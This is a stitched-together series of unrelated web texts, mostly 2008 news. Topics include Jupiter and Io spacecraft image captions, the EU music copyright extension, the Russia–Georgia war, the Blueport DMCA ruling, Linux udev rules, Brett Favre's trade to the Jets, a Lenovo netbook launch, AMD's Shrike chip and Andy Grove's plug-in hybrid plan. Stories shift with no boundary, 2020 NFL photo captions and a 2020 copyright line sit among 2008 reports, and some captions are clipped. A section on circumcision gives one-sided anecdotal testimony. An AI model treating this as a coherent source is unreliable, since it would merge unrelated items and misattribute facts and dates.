This double ridge is about 2.6 kilometers ( 1.6 miles ) wide and stands some 300 meters ( 330 yards ) high .
( NASA / JPL / ASU )
A composite of several images taken in several colors by the New Horizons Multispectral Visual Imaging Camera , or MVIC , illustrating the diversity of structures in Jupiter 's atmosphere , in colors similar to what someone " riding " on New Horizons would see .
It was taken near the terminator , the boundary between day and night , and shows relatively small - scale , turbulent , whirlpool - like structures near the south pole of the planet .
The dark " holes " in this region are actually places where there is very little cloud cover , so sunlight is not reflected back to the camera .
( NASA / Johns Hopkins University Applied Physics Laboratory / Southwest Research Institute )
This image , acquired during Galileo 's ninth orbit around Jupiter , shows two volcanic plumes on Io .
One plume was captured on the bright limb or edge of the moon , erupting over a caldera ( volcanic depression ) named Pillan Patera .
The plume seen by Galileo is 140 kilometers ( 86 miles ) high , and was also detected by the Hubble Space Telescope .
The second plume , seen near the terminator , the boundary between day and night , is called Prometheus .
The shadow of the airborne plume can be seen extending to the right of the eruption vent .
( NASA / JPL / University of Arizona )
A part of the southern hemisphere of Io , seen by the spacecraft Voyager at a range of 74,675 km .
In the foreground is gently undulating topography , while in the back - ground are two mountains with their near faces brightly illuminated by the sun .
The mountain in the right is approximately 150 km across at its base and its height is probably in excess of 15 km which would make it higher than any mountain on Earth .
( NASA / JPL )
This five - frame sequence of New Horizons images captures the giant plume from Io 's Tvashtar volcano .
Snapped by the probe 's Long Range Reconnaissance Imager ( LORRI ) as the spacecraft flew past Jupiter earlier this year , this first - ever " movie " of an Io plume clearly shows motion in the cloud of volcanic debris , which extends 330 kilometers ( 200 miles ) above the moon 's surface .
Only the upper part of the plume is visible from this vantage point - the plume 's source is 130 kilometers ( 80 miles ) below the edge of Io 's disk , on the far side of the moon .
( NASA / Johns Hopkins University Applied Physics Laboratory / Southwest Research Institute )
A volcanic plume rises over 300 kilometers above the horizon of Jupiter 's moon
Io in this image from cameras onboard the New Horizons spacecraft .
The volcano , Tvashtar , is marked by the bright glow ( about 1 o'clock ) at the moon 's edge , beyond the terminator or night / day shadow line .
The shadow of Io cuts across the plume itself .
Also capturing stunning details on the dayside surface , the high resolution image was recorded when the spacecraft was 2.3 million kilometers from Io .
Later it was combined with lower resolution color data by astro-imager Sean Walker to produce this sharp portrait of the solar system 's most active moon .
( NASA , JHU / APL , SwRI - Additional Processing : Sean Walker )
Jupiter 's moon
Io , seen by NASA 's Galileo spacecraft against a backdrop of Jupiter 's cloud tops , which appear blue in this false - color composite .
( NASA / JPL / University of Arizona )
A mosaic of Jupiter 's ring system , acquired by NASA 's Galileo spacecraft when the Sun was behind the planet , and the spacecraft was in Jupiter 's shadow peering back toward the Sun. ( NASA / JPL / Cornell University )
The first color movie of Jupiter from NASA 's Cassini spacecraft shows what it would look like to peel the entire globe of Jupiter , stretch it out on a wall into the form of a rectangular map , and watch its atmosphere evolve with time .
The brief movie clip spans 24 Jupiter rotations between Oct. 31 and Nov. 9 , 2000 .
The darker blips that appear are several moons and their shadows .
( NASA / JPL / University of Arizona )
An image of the leading hemisphere of Ganymede seen by NASA 's Galileo spacecraft .
Many fragmented regions of dark terrain split by lanes of bright grooved terrain cover the surface .
Several bright young craters can be seen , including a linear chain of craters near the center of the image which may have resulted from the impact of a fragmented comet , similar to comet Shoemaker - Levy / 9 which hit Jupiter in 1994 .
( NASA / JPL / Brown University )
The area of Nicholson Regio and Arbela Sulcus illustrates many of the diverse terrain types on Jupiter 's moon Ganymede , as seen in this image taken by NASA 's Galileo spacecraft .
The image covers an area approximately 89 by 26 kilometers ( 55 by 16 miles ) .
( NASA / JPL / Brown University )
Jupiter 's Great Red seen by NASA 's Voyager spacecraft .
July , 1979 Around the northern boundary a white cloud is seen , which extends to east of the region .
The presence of this cloud prevents small cloud vortices from circling the spot in the manner seen in the Voyager 1 encounter .
Another white oval cloud ( different from the one present in this position three months ago ) is seen south of the Great Red Spot .
This image was taken on July 6 , 1979 from a range of 2,633,003 kilometers .
The Red Spot is 20,000 km across .
( NASA / JPL )
This true color mosaic of Jupiter was constructed from images taken by the narrow angle camera onboard NASA 's Cassini spacecraft on December 29 , 2000 , as the spacecraft neared Jupiter during its flyby of the giant planet .
It is the most detailed global color portrait of Jupiter ever produced .
Although Cassini 's camera can see more colors than humans can , Jupiter here looks the way that the human eye would see it .
( NASA / JPL / SSI )
More links and information :
On Jupiter , a Battle of the Red Spots , With the Baby Losing - NYTimes.com 7/22
Jupiter - wikipedia entry
nasaimages.org - a new comprehensive database of NASA images
The IFPI and mediocre artists around the world are rubbing their hands in glee , after a proposal to extend copyright in the EU for another 45 years .
The proposal , intended to ' benefit musicians ' , comes up for a vote on Wednesday .
On the plus side , at the same time collecting societies are going to have their practices scrutinized .
The proposal by Irish EU commissioner Charlie McCreevy , currently serving as European Commissioner for Internal Market & Services , was first proposed back in February .
It aims to extend copyright protection for performing artists from 50 years to 95 .
The proposal is supposed to secure the pensions of long forgotten artists .
In a statement , McCreevy said “ I am not talking about featured artists like Cliff Richard or Charles Aznavour .
I am talking about the thousands of anonymous session musicians who contributed to sound recordings in the late fifties and sixties .
They will no longer get airplay royalties from their recordings .
But these royalties are often their sole pension . ”
According to the Financial Times , the proposal could come up to vote as early as this Wednesday , July 16th .
Also up for discussion would be a plan to split up rights societies by the antitrust arm of the commission , potentially making rights societies compete against each other for the rights to collect royalties from artists .
While this would certainly be a better way to curb their less than philanthropic actions , if it comes at the cost of greater copyright , is it that beneficial to the 500 million citizens of Europe ?
There is a glimmer of hope though .
Two commissioners are opposed to the extension plan ; telecoms commissioner Viviane Reding and commissioner Antonio Tajan .
The copyright extension plans met initial scorn back when they were first announced in February , with groups like the Open Rights Group and the EFF launching a petition to have it blocked , as well as a website to deal with the issue .
Nevertheless , McCreevy kept on going , and the proposal is now ready to be voted on .
McCreevy himself has his pension already planned from a former partnership in a chartered accountancy firm ( and he has been in politics since 1977 , so he clearly planned early ) .
It is left to wonder then why he feels the need to legislate some sort of speciality pension for artists .
If they decide to stop work at 25 , why should they be paid for it past 75 ?
If that has been their only source of income , why could they not have done as the hundreds of millions of other EU citizens , myself included , and planned for their retirement ?
Commissioner McCreevy had not replied to a request for comment at the time of publication .
UPDATED :
President Bush on Wednesday announced he will send U.S. military forces into the small Caucasus nation of Georgia to deliver “ humanitarian aid , ” a move clearly intended to bolster the Western - leaning nation after an invasion by the Russian army .
Mr. Bush , in a statement to reporters at the White House , also announced that he is sending Secretary of State Condoleezza Rice on a trip to France and then to Georgia , on a mission to “ rally the free world at the defense of a free Georgia . ”
The president spoke with Ms. Rice on his right and Secretary of Defense Robert Gates on his left , and said he had asked Mr. Gates to “ begin a humanitarian mission to the people of Georgia headed by the United States military . ”
The announcement was hailed by Georgian President Mikheil Saakashvili as “ definitely an American military presence ” and “ a turning point . ”
In an interview with the New York Times , he said he expected the U.S. military to secure Georgian seaports and its main airport .
White House press secretary Dana Perino , however , expressed skepticism at that idea .
Mr. Saakashvili , a Harvard - trained lawyer , said in multiple interviews Wednesday that the initial U.S. response to the conflict was weak and ineffective .
“ Frankly , some of the first statements from Washington were perceived by the Russians almost as a green light for doing this because they were too soft , ” he said on CNN .
“ Everything the Americans had achieved from the Cold War is being undermined and destroyed right now , ” Mr. Saakashvili said .
“ America is losing the whole region . ”
Mr. Bush called for Russia to cease all military operations and withdraw its troops out of Georgia , expressing concern about reports that Kremlin forces are occupying the central Georgian city of Gori and have destroyed Georgian ships in the port city of Poti , in violation of a cease - fire agreement reached Tuesday .
The president said the U.S. military humanitarian mission “ will be vigorous and ongoing . ”
“ A U.S. C - 17 aircraft with humanitarian supplies is on its way , ” Mr. Bush said .
“ And in the days ahead we will use U.S. aircraft as well as naval forces to deliver humanitarian and medical supplies . ”
“ We expect Russia to honor its commitment to let in all forms of humanitarian assistance .
We expect Russia to ensure that all lines of communication and transport , including seaports , airports , roads and airspace , remain open for the delivery of humanitarian assistance and for civilian transit , ” he said .
Russian Foreign Minister Sergei Lavrov mocked the U.S. alliance with Georgia , and said that the U.S. will have to choose between allying itself with Russia or Georgia .
“ We understand that this current Georgian leadership is a special project of the United States , but one day the United States will have to choose between defending its prestige over a virtual project or real partnership which requires joint action , ” Mr. Lavrov said , according to a Reuters dispatch .
Russian President Dmitri Medvedev declared Aug. 13 a day of mourning for the humanitarian disaster in Georgia .
Russia contends that they only responded to an attack last week by Georgian forces in a northern province of the country claimed by both Georgia and Russia .
Russia claims that Georgian forces committed atrocities against Russian citizens in the disputed area of South Ossetia .
Georgia , a former Soviet Republic of about 4 million people , has been humiliated militarily by Russia during a nearly weeklong conflict .
About 2,000 people are estimated dead in the fighting , about 100,000 have been displaced , and there are unconfirmed reports of atrocities being committed by Russians against Georgian citizens .
Mr. Bush said he was “ concerned about reports that Georgian citizens of all ethnic origins are not being protected . ”
“ All forces , including Russian forces , have an obligation to protect innocent civilians from attack , ” he said .
In addition , Russia has destroyed much of Georgias military arsenal , which had been compiled with help from the U.S. government in an effort to make the fledgling democracy eligible for membership in the North Atlantic Treaty Organization .
Russia sees the NATO aspirations of Georgia and fellow former Soviet bloc nation Ukraine as threats to their standing in the region , and blocked the two countries from receiving invitations to begin the membership process in April .
Mrs. Perino said that if Georgia had been invited into the Membership Application Plan process at that time , that might have prevented Russia from invading Georgia .
“ We might not be in this situation at all , ” she said .
Georgia and Ukraine are scheduled to receive reviews of their membership aspirations in December .
Because NATO requires member countries to achieve a modernization of their armies , Russia may have dealt Georgia a serious setback by destroying much of their military arsenal .
Mrs. Perino , however , said the extent of damage to Georgias military was so far uncertain and said U.S. officials “ hope that it is on track to give them [ MAP ] status . ”
Ms. Rice , who canceled a press conference at the State Department to meet with Mr. Bush earlier Wednesday morning , will travel first to France to meet with French President Nicolas Sarkozy .
Mr. Sarkozy is serving as the current chairman of the European Union and was in Moscow and the Georgian capital of Tblisi Tuesday to negotiate the cease - fire .
Ms. Rice on Tuesday said of Mr. Sarkozys mediation , “ I believe that they believe that they have made some progress , and we welcome that , and we certainly welcome the EU mediation . ”
In Tblisi , the president said Ms. Rice “ will personally convey America ’s unwavering support for Georgia ’s democratic government . ”
Mr. Saakashvili has warned that Russia will not stop at occupying Georgia if Europe and the U.S. do not act to check the Kremlin ’s regional ambitions .
Mr. Bush has called Russias actions in Georgia “ disproportionate ” to their stated aims of rebuffing an attack by Georgian forces last Thursday on the disputed northern Georgian region of South Ossetia .
He said that Russia in recent years has sought to “ integrate into the diplomatic , political , economic and security structures of the 21st century , ” but that their aggressions in Georgia have put relations with the West “ at risk . ”
Sign up for Daily Newsletters Manage Newsletters
Copyright © 2020 The Washington Times , LLC .
Click here for reprint permission .
Four United States soldiers have been charged with conspiracy to commit murder in connection with the deaths of several detainees in Iraq in early 2007 , the US Army says .
The soldiers were charged in Grafenwoehr , Germany , where they are currently serving in the 172nd Infantry Brigade , the army said in a statement .
" The soldiers were charged with conspiracy to commit premeditated murder , " the statement said .
" The charges relate to an incident that occurred during April / May 2007 in Baghdad , Iraq , while the soldiers were serving in the 1st Battalion , 18th Infantry , " it said .
The statement provided no details on the incident , and army public affairs officers refused to elaborate on what the soldiers were accused of doing .
But a spokesman for the US Army in Europe referred reporters to a separate army statement in January 2008 that said the army was investigating the deaths of several detainees captured during combat operations in 2007 by members of the 2nd Brigade Combat Team , 1st Infantry Division .
The soldiers charged include Staff Sergeant Jess Cunningham , Sergeant Charles Quigley , Specialist Stephen Ribordy , and Specialist Belmor Ramos who are from a mechanised infantry unit that belonged to the 1st Infantry Division .
- AFP
Last week , a US Court of Appeals upheld a ruling on software piracy .
The organization doing the piracy , however , happened to be a branch of the US government , and the decision highlights the significant limits to the application of copyright law to the government charged with enforcing it .
Most significantly , perhaps , the court found that because the DMCA is written in a way that targets individual infringers , the government cannot be liable for claims made under the statute .
The backstory on the case involved , Blueport v. United States , borders on the absurd .
It started when Sergeant Mark Davenport went to work in the group within the US Air Force that ran its manpower database .
Finding the existing system inefficient , Davenport requested training in computer programming so that he could improve it ; the request was denied .
Showing the sort of personal initiative that only gets people into trouble , Davenport then taught himself the needed skills and went to work redesigning the system .
Although Davenport did his development on a personal system at home , he began to bring beta versions of his code in for testing , and eventually started distributing his improved system within his unit , giving the software a timed expiration .
A demonstration to higher - ups led to a recommendation for his immediate promotion , but that was followed by demands that the code for his software be turned over to the USAF .
Davenport responded by selling his code to Blueport , which attempted to negotiate a license with the Air Force , which responded by hiring a company to hack the compiled version by deleting the code that enforced the expiration date .
Blueport then sued , citing copyright law and the DMCA .
DMCA : We 'll enforce it , but wo n't abide by it
The Court of Federal Claims that first heard the case threw it out , and the new Appellate ruling upholds that decision .
The reasoning behind the decisions focuses on the US government 's sovereign immunity , which the court describes thusly : " The United States , as [ a ] sovereign , 'is immune from suit save as it consents to be sued . . . and the terms of its consent to be sued in any court define that court ’s jurisdiction to entertain the suit . ' "
In the case of copyright law , the US has given up much of its immunity , but the government retains a few noteworthy exceptions .
The one most relevant to this case says that when a government employee is in a position to induce the use of the copyrighted material , " [ the provision ] does not provide a Government employee a right of action ' where he was in a position to order , influence , or induce use of the copyrighted work by the Government . ' "
Given that Davenport used his position as part of the relevant Air Force office to get his peers to use his software , the case fails this test .
But the court also addressed the DMCA claims made by Blueport , and its decision here is quite striking .
" The DMCA itself contains no express waiver of sovereign immunity , " the judge wrote , " Indeed , the substantive prohibitions of the DMCA refer to individual persons , not the Government . "
Thus , because sovereign immunity is not explicitly eliminated , and the phrasing of the statute does not mention organizations , the DMCA cannot be applied to the US government , even in cases where the more general immunity to copyright claims does not apply .
It appears that Congress took a " do as we say , not as we need to do " approach to strengthening digital copyrights .
A sad footnote to this story is that we became aware of it through the blog of copyright lawyer William Patry , only to see Patry shut down the blog late last week .
Patry says that a major factor in his decision was frustration with the current state of copyright law and with the aggressive stupidity that he felt typified a number of responses to his musings on the law .
But Patry also cites the inability of many to separate his personal thoughts on copyright from those he voices through his duties as Google 's Senior Copyright Counsel .
Given that Google ( and many other companies ) offer many significant announcements through their blogs , and Patry is notable in part due to his employer , this sort of confusion seems inevitable ; still , it 's unfortunate that it has brought a ( temporary ? ) end to such a learned and public voice on copyright issues .
Udev rules and the management of the plumbing layer
Benefits for LWN subscribers
The primary benefit from subscribing to LWN is helping to keep us publishing , but , beyond that , subscribers get immediate access to all site content and access to a number of extra site features .
Please sign up today !
/ dev
/ dev
Once upon a time , a Linux distribution would be installed with adirectory fully populated with device files .
Most of them represented hardware which would never be present on the installed system , but they needed to be there just in case .
Toward the end of this era , it was not uncommon to find systems with around 20,000 special files in , and the number continued to grow .
This scheme was unwieldy at best , and the growing number of hotpluggable devices ( and devices in general ) threatened to make the whole structure collapse under its own weight .
Something , clearly , needed to be done .
For a little while , it seemed like that something might be devfs , but that story did not end well .
The real solution to the / dev mess turned out to be a tool called " udev , " originally written by Greg Kroah - Hartman .
Udev would respond to device addition and removal events from the kernel , creating and removing special files in / dev .
Over time , udev gained more powerful features , such as the ability to run external programs which would help to create persistent names for transient devices .
Udev is now a key component in almost all Linux systems .
It 's like the plumbing in a house ; most people never notice it until it breaks .
Then they realize how important a component it really is .
Udev is configured via a set of rules , found under / etc / udev / rules.d on most systems .
These rules specify how devices should be named , what their ownership and permissions should be , which kernel modules should be loaded , which programs should be run , and so on .
The udev rule set also allows distributors and system administrators to tweak the system 's device - related behavior to match local needs and taste .
Or maybe not .
Udev maintainer Kay Sievers has recently let it be known that he would like all distributors to be using the set of udev rules shipped with the program itself .
Says Kay :
We should all unify as far as possible .
Red Hat , SUSE and Gentoo are already using the same rules files , with a minimal rules set on top , in a distro specific file .
We ask the rest of the universe to join us , and do the same .
This request was surprising to some .
A Linux system is full of utilities with configuration files under /etc ; there is not normally a push for all distributions to use the same ones .
So why should all distributors use the same udev rules ?
The reasoning here would appear to come down to these points :
The udev rules files are not really configuration files - they are , instead , code written in a domain - specific language .
For a distributor to change those files is akin to patching the underlying C code ; far from unheard of , but generally seen as being undesirable .
As a way of underscoring this point , the udev developers are moving the udev rules out of /etc and into / lib .
and into .
There is little reason for distributors to differentiate themselves based on their device naming schemes , and every reason to have all Linux systems use the same device names .
For the situations where reasonable distributions may still differ - which group should own a device , for example - there is a mechanism to add distributor - specific rules .
Increasingly , other packages will depend on a specific udev setup for the underlying system .
Distributors which use their own rules will have a harder time making these new tools work right .
That last point refers , in particular , to DeviceKit , a set of tools designed to make the management of devices easier .
Between them , udev and DeviceKit are being positioned to replace most of the functionality in the much - maligned hal utility .
See this posting from David Zeuthen for lots more information on DeviceKit and the migration away from hal in general .
The only problem is that some distributors are n't playing along .
Marco d'Itri , the Debian udev maintainer , responded that a common set of udev rules is " not going to happen . "
The default rules , he says , do not meet Debian 's need to support older kernels , and , besides , " I consider my rules much more readable and elegant than yours " .
Ubuntu maintainer Scott James Remnant is also reluctant to use the default rules .
Scott appears to be willing to consider a change to the default rules if it can be made to work right ; Marco , instead , seems determined to hold out .
When encouraged to send patches to improve the default rules ( and make them more elegant ) , he responded :
Tell me what 's missing from my rules instead , I will fix it and then you will be able to use them .
If nothing is missing , then you can replace the files right now .
It appears likely that most of the distributors will come to see the udev rules as code which is to be maintained upstream ; even Debian may come along eventually .
As this happens , the layer of " plumbing " which sits just on top of the kernel should be worked into better shape .
Kernel developers may find themselves involved in this process ; David has posted a proposal that all new kernel subsystems , before being merged , must be provided with a set of udev rules .
That would help the udev developers get a set of default rules into shape before the distributors feel the need to step in to make things work .
Increasingly , the operation of the kernel is being tied to a set of low - level user - space applications ; there is not much which can be done with a bare kernel .
How all of this low - level plumbing should work , and how it should interoperate with the kernel , is still being worked out .
The management of udev policies is just one of the outstanding issues .
So the upcoming Linux Plumbers Conference would seem to be well timed ; there 's a lot to talk about .
If this is n’t the funniest thing … .
a nine year old version of Gordon Ramsay currently stars in a series of videos for U.K. hospitality recruitment website Caterer.com .
Caterer.com says the videos will help stressed - out summer hospitality workers relax , and “ show new industry talent how enjoyable and attractive the sector is . ”
A third video is said to be in the works .
Priceless !
Related
With thousands upon thousands of beer breweries found all over the world , competition is as large as it is fierce ....
The Brett Favre era in Green Bay officially came to an end late Wednesday night as the legendary longtime Packers quarterback was traded to the New York Jets , the Packers announced .
The exact compensation was n't immediately available , but it is believed to be a fourth - round draft pick that increases in value depending on how the Jets perform in the 2008 season .
According to the NFL Network , if Favre takes 50 percent of total snaps with the Jets in 2008 , the fourth - rounder becomes a third - round pick .
If he gets 70 percent of the snaps and the Jets make the playoffs , it becomes a second - round pick ; and if he gets 80 percent of snaps and the Jets make the Super Bowl , it becomes a first - round pick .
The Packers had been talking with the Jets and Tampa Bay Buccaneers since deciding earlier this week that the team and the
three - time MVP could n't coexist .
The Packers decided to move
forward with Aaron Rodgers as their starter after Favre announced
his retirement in March .
" Brett has had a long and storied career in Green Bay , and the
Packers owe him a tremendous debt of gratitude for everything he
accomplished on the field and for the impact he made in the
state , " Green Bay officials said in a statement .
This week in the National Football League
The Ravens ' Lamar Jackson ( R ) is sacked for a loss by Chiefs defenders .
Photo by David Tulis / UPI
The Ravens ' Miles Boykin ( 60 ) is unable to make the end zone catch under pressure from the Chiefs ' Rashad Fenton .
Photo by David Tulis / UPI
A limited number of football fans occupy the stands .
Photo by David Tulis / UPI
Mahomes scrambles for yardage against the Ravens .
Photo by David Tulis / UPI
The Ravens ' Lamar Jackson ( L ) pushes the Chiefs ' Juan Thornhill away during the first half .
Photo by David Tulis / UPI
Green Bay Packers ' Aaron Rodgers ( 12 ) looks to throw the ball against the New Orleans Saints in New Orleans on Sunday .
Rodgers completed 21 of 32 passes in the Packers ' 37 - 30 triumph .
Photo by AJ Sisco / UPI
The Saints ' Alvin Kamara ( R ) runs past the Packers ' Jaire Alexander .
Photo by AJ Sisco / UPI ..
Packers linebacker Za'Darius Smith ( C ) celebrates with teammates after recovering a fumble .
Photo by AJ Sisco / UPI
The Cincinnati Bengals ' Auden Tate ( C ) is tackled by the Philadelphia Eagles ' Trevor Williams ( L ) and Jalen Mills .
The game ended in a tie , 23 - 23 .
Photo by Derik Hamilton / UPI
The Eagles ' Carson Wentz throws the ball against the Bengals .
Photo by Derik Hamilton / UPI
The Bengals ' Joe Burrow throws the ball against the Eagles .
Photo by Derik Hamilton / UPI
Wentz ( C ) runs the ball against the Bengals .
Photo by Derik Hamilton / UPI
The Eagles ' Greg Ward runs past the Bengals ' Mackensie Alexander .
Photo by Derik Hamilton / UPI
New England Patriots ' Deatrich Wise Jr. celebrates after a fumble recovery in the end zone for a touchdown against the Las Vegas Raiders in Foxborough , Mass . , on Sunday .
The Patriots defeated the Raiders 36 - 20 .
Photo by Matthew Healey / UPI
The Patriots ' Jason McCourty ( L ) and linebacker Ja'Whaun Bentley ( R ) reach for a pass intended for Las Vegas Raiders ' Josh Jacobs .
Photo by Matthew Healey / UPI
The Patriots ' J.J. Taylor ( L ) charges past the Raiders ' Maurice Hurst on a carry .
Photo by Matthew Healey / UPI
MOSCOW , Aug 27 ( Reuters ) - Russian President Dmitry Medvedev flew to Tajikistan 's capital Dushanbe on Wednesday to try to drum up support from eastern allies for its tough policy on Georgia that the West has condemned .
The summit of the Shanghai Cooperation Organisation ( SCO ) takes place on Thursday as the dust is still settling from the Kremlin 's military intervention in Georgia and its recognition of the breakaway Abkhazia and South Ossetia regions .
Western governments issued strongly worded condemnations of the Kremlin 's decision to grant recognition , deepening a rift that has already drawn comparisons with the Cold War .
But Moscow 's allies in the former Soviet Union , Asia and elsewhere , who traditionally side with the Kremlin against the West on contentious issues , have been notable for their silence .
The biggest prize for Russia would be to win the support of China when Medvedev meets Chinese President Hu Jintao at the summit .
But analysts say Moscow will not receive decisive backing from Beijing .
" China , which has own separatists , will be the biggest problem , " Alexei Mukhin , head of the Centre of Political Information think tank , said .
" The recognition of Abkhazia and South Ossetia is unacceptable for Beijing . "
Georgia was not included in the formal agenda for the summit of the SCO , which also includes Kazakhstan , Kyrgyzstan , Tajikistan and Uzbekistan
But analysts say the agenda will be pushed to one side by the need to discuss the new political realities created by Russia 's military operation in Georgia and Moscow 's growing confrontation with the West .
Chinese Foreign Ministry spokesman Qin Gang told reporters in Beijing : " During the summit , the leaders of different countries can ... enunciate shared positions on issues of interest to them , including South Ossetia . "
MAINTAINING A BALANCE
The other four SCO members , all ex-Soviet states who have so far refrained from expressing outright support for Russia on Georgia , all have their own reasons to adopt a " wait - and - see " position .
The four , all in ex-Soviet Central Asia , have built their foreign policy strategies on trying to maintain a balance between loyalty to Moscow and building ties with the West .
Kyrgyzstan will find this balancing act particularly difficult as it now hosts both Russian and U.S. military bases .
Analysts say the most Medvedev can hope for is for SCO leaders to say they understand Russia 's motives , without going any further .
" No one will recognise South Ossetia and Abkhazia , " Boris Makarenko , deputy head of Moscow 's Centre for Political Technologies think tank said .
In other business , the Kremlin source said the summit would look at procedures for bringing in new members .
That could allow Iran , which has been an observer at past SCO meetings , to play a greater role -- a development that would help the Kremlin achieve its ambition of turning the organisation into a political counterweight to the West .
Rumors of Lenovo entering the mini - notebook space end here and now .
Lenovo officially announced this morning its IdeaPad S10 - a 10 - inch mini-notebook running the 1.6GHz Intel Atom chipset .
Do we have a MSI Wind or Eee PC 1000H killer on our hands ?
Quite possibly .
Two configurations of the 9.8 x 7.2 x .8-1.08 - inch and 2.4 - pound S10 will be available in the U.S. Priced at $ 399 , one will have 512MB of RAM and an 80 GB hard drive .
The other marked at $ 449.99 will have 1GB of RAM and a 160 GB hard drive .
The specs seem to indicate that the system will support 2GB of RAM , so we assume swapping out RAM will be easy .
Initially the netbook will come preloaded with Microsoft Windows XP .
However , Lenovo told us that a version of the S10 running Linpus Linux will be available is other countries .
We cannot wait to get our hands on the mini-notebook as the keyboard is reportedly " 85 percent of the size of a full - function notebook PC ’s keyboard . "
A close look at the pictures in the gallery below strongly suggest a large and comfortable touchpad with dedicated right and left mouse buttons .
The touchpad will support multi - touch gestures .
The 10 - inch 1024 x 600 - pixel ( WSVGA ) resolution screen also looks extremely promising and is LED backlit for power saving .
The speakers lining the front of the system also give it a different look and will hopefully blast out some decent sound as they are n't buried on the bottom .
Lenovo has seemed to work in all the important ports .
The netbook includes Bluetooth connectivity , 802.11b/g , and an ExpressCard for popping in a mobile broadband card .
It also sports a LAN connection and VGA - out .
It has a 1.3 - megapixel webcam , two USB ports , mic and headphone jacks , and a 4 - in - 1 card reader .
I am hesitant about only 2 USB ports .
As for battery life , Lenovo is promising that the system will be available with a 3 - cell battery , capable of 3 hours , and 6 - cell , capable of lasting 6 hours .
The IdeaPad S10 will come in white , black , and a glossy ruby red .
It will be on retail shelves in the U.S. on September 28 and perhaps on Lenovo.com a bit earlier .
It will be available in China , however , on September 5 and in the far east on September 10 .
A version of the S10 with a 9 - inch screen will be available in select countries such as Hong Kong , Taiwan , Russia , Singapore , Malaysia , Vietnam , Mexico , India , France , Turkey , Poland , and others .
“ After the circumcision there was a major change .
It was like night and day .
I lost most sensation .
I would give anything to get the feeling back . ”
Only men circumcised as adults can experience the difference a foreskin makes .
In the Journal of Sex Research , Money and Davison from the Johns Hopkins University School of Medicine reported on five such men .
Changes included diminished penile sensitivity and less penile gratification .
The investigators concluded ,
Erotosexually and cosmetically , the operation is , for the most part , contraindicated , and it should be evaluated in terms of possible pathological sequelae .
Other men circumcised as adults regret the change :
I play guitar and my fingers get callused from playing .
That ’s similar to what happened to my penis after circumcision .
After the circumcision there was a major change .
It was like night and day .
I lost most sensation .
I would give anything to get the feeling back .
I would give my house .
[ This man ’s physician persuaded him to be circumcised by warning he could otherwise get penile cancer .
When the man complained of the result , the physician replied , “ That ’s normal ” and would not help him . ]
Slowly the area lost its sensitivity , and as it did , I realized I had lost something rather vital .
Stimuli that had previously aroused ecstasy had relatively little effect .
. . .
Circumcision destroys a very joyful aspect of the human experience for males and females .
The greatest disadvantage of circumcision is the awful loss of sensitivity when the foreskin is removed .
. . .
On a scale of 10 , the intact penis experiences pleasure that is at least 11 or 12 ; the circumcised penis is lucky to get to 3 .
The sexual differences between a circumcised and uncircumcised penis is . . . like wearing a condom or wearing a glove .
. . .
Sight without color would be a good analogy .
. . .
Only being able to see in black and white , for example , rather than seeing in full color would be like experiencing an orgasm with a foreskin and without .
There are feelings you ’ll just never have without a foreskin .
One day after Intel officially released details on its Larrabee platform , the chipmaker 's rival AMD leaked details of its own competing Fusion CPU and GPU single chip , code - named Shrike .
A number of sources are reporting AMD is leveraging its acquisition of ATI and will soon release the chip consisting of a dual - core Phenom CPU with an ATI RV800 GPU core .
The chip will be DirectX 10.1 compatible and is expected to debut on a 40nm platform , courtesy of chip manufacturer TSMC , according to a TG Daily report .
What this means for consumers is a race of one - upmanship in the graphics card space between Intel and AMD to deliver better looking PC - based games and video in very high detail .
The leaked details also reveal that Shrike is scheduled to transition to 32nm at the beginning of 2010 , " coincidentally " when Intel 's 10 - plus core chips will be launched , also on 32nm technology .
Following yesterday 's Intel reports , it seems that AMD upped the game and put Fusion on the front burner as a way to compete with Intel 's Larrabee - at least in the near future .
If Andy Grove had his way , electric utilities would offer consumers free electricity for two years to help popularize plug - in hybrids , and governments would pay half of the cost of converting gasoline - engine cars into plug-ins .
Grove , former CEO and chairman of Intel ( NSDQ : INTC ) , the world ’s largest chipmaker , spoke Tuesday at the first - ever Plug - In conference in San Jose , Calif. , where he outlined his plan for enticing consumers to drive plug - in hybrids .
Not enough effort is going into promoting electricity as a replacement for fossil fuels , Grove said .
He called for the public to “ transform our energy industry ” and showed slides with phrases such as “ There will be blood ” and “ Clear and present danger ” to emphasize the urgency and difficulty of accomplishing the goal .
“ We are at a strategic inflection point in our country and for the $ 7 trillion energy industry worldwide , ” Grove said .
“ We are , so far , doing the very worse that we can do , which is worse than ignoring that there is a problem . ”
Promoting plug - in hybrids has become a passion for Grove , who is one of a stream of industry and political heavyweights who have used their fame and power to draw attention to the energy debate this year .
Last week , former Vice President Al Gore urged Americans to produce all of the country ’s electricity from renewable and emission - free sources in 10 years ( see Al Gore Sets Energy Goal ) .
In a recent issue of The American , published by the American Enterprise Institute , Grove talked about the beauty of electric power – it can be produced locally and from many sources , and it can be transported quickly across long distances .
In an interview with the Associated Press in June , he urged local and federal governments – as well as private industry – to do more to promote plug - in hybrids .
Unlike traditional gasoline - electric hybrids such as the Toyota Prius , plug - in hybrids – which also are equipped with both an internal combustion engine and an electric motor – can recharge their batteries at standard electrical outlets and get more than 100 miles per gallon by using less fuel and more electricity .
Some automakers are likewise considering plug - in hybrids as the next stage of an electric - car evolution .
But challenges such as a lack of better and cheaper car batteries , as well as a paucity of charging stations , have kept electric cars from being feasible for road trips – and viable for mainstream buyers , according to some analysts .
But range is less of an issue with plug - in hybrids , because drivers could always fill up on fuel for longer trips , yet many could potentially use the vehicles as electric cars for shorter daily commutes .
Several major carmakers , including General Motors , Toyota and Volkswagen , plan to introduce plug - in hybrids in 2010 .
At the conference on Tuesday , Grove reiterated the plan he proposed last month to make plug - in hybrids mainstream .
A key element of his proposal is to figure out ways to help consumers convert existing trucks , SUVs and vans into plug - in hybrids .
A123Systems ’ Hymotion , for example , is taking this approach .
The company in April began accepting orders for a kit to turn Toyota Prius cars into plug-ins , and in June announced that six dealers had signed up to perform the conversions ( see Can Hymotion Convert the Auto Industry ?
and Toyota Dealers Sold on Hymotion Plug - In Hybrids ) .
Grove also said utilities should provide free electricity for two years for powering converted plug - in hybrids .
He called for a tax credit to pay for 50 percent of the expenses of retrofitting cars , a cost that he said could be offset by an increase in licensing fees for all vehicles , boats and airplanes .
Here are some of his other proposals :
Create a special federal court system to efficiency resolve intellectual property disputes and promote public interest .
Standardize battery and other technologies .
Invest more venture capital in technologies that promote plug - in hybrids .
Assemble a consortium of automakers , utilities , technology companies and public research institutions to better lobby the government for change .
Once assembled , Grove called for the consortium to create a plan to have 10 million plug - in hybrids on the road in four years and to present the plan to the next president in January .
